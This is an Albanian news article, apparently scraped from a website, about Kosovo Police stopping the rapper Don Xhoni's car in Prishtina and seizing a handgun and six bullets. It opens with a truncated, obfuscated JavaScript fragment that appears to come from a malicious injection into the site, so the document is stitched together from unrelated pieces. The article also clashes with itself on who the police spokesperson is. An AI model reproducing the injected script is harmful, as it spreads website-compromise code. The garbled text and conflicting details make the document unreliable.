;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Policia tregon çka gjeti në kontrollin e detajishëm në veturën e Don Xhonit

By

Portali Front Online raportoi sot përmes një videoje se Policia e Kosovës ndaloi reperin, Don Xhoni.

Pas publikimit të lajmit , ka reaguar vetë Don Xhoni.

Ai ka postuar një story në Instagram me mikun, që dyshohet se u arrestua nga Policia.

“Çka të thanë o bir”, e pyeti reperi mikun e tij me emrin Festim Trumcaku.

Front Online ka kontaktuar Policinë e Kosovës ku këta të fundit e kanë konfirmuar se pas një kontrolli të detajuar që i është bërë personave dhe veturës, policia ka sekuestruar një armë të shkurtë si dhe 6 fishekë.

“Policia e Rajonit të Prishtinës, respektivisht zyrtarët e Njësitit të reagimit të shpejtë, sot rreth orës 14:30, në rrugën “Tirana” në Prishtinë, për kontrollë rutinore, kanë ndaluar një veturë të tipit Range Rover. Pas një kontrolli të detajuar që i është bërë personave dhe veturës, policia ka arritur që të gjej dhe të sekuestroj: -një armë të shkurtë – në karikatorë si dhe -6 fishekë”.

Flora Ahmeti zëdhënësja e policisë për Front Online ka thënë se i dyshuari F.S mashkull 25 vjeç është dërguar për intervistim, dhe më pas i njejti është liruar në procedurë të rregullt.

“I dyshuari; -F.S,mashkull 25 vjeç, shtetas i Republikës së Kosovës, është dërguar për intervistim, në stacionin policor qendra në Prishtinë. Ndaj tij është iniciuar rasti për mbajtje në pronësi, kontroll ose posedim të pa autorizuar të armës dhe i njëjti është liruar në procedurë të rregullt”, njoftoi Gashi për Front Online.

Artikuj të ngjashëm